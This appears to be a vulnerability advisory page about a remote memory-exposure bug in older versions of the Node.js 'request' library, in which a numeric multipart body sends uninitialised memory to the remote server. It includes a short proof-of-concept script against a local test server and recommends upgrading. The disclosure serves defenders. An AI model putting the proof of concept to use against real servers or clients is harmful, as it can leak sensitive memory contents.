Lucene search

K
nodejsFeross AboukhadijehNODEJS:309
HistoryFeb 01, 2017 - 11:21 p.m.

Remote Memory Exposure

2017-02-0123:21:46
Feross Aboukhadijeh
www.npmjs.com
58

0.002 Low

EPSS

Percentile

55.9%

Overview

Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.

Proof of Concept

var request = require('request');
var http = require('http');

var serveFunction = function (req, res){
	req.on('data', function (data) {
            console.log(data)
        });
	res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

request({
	method: "POST",
	uri: 'http://localhost:8000',
	multipart: [{body:500}]
},function(err,res,body){});

Recommendation

Update to version 2.68.0 or later

References

0.002 Low

EPSS

Percentile

55.9%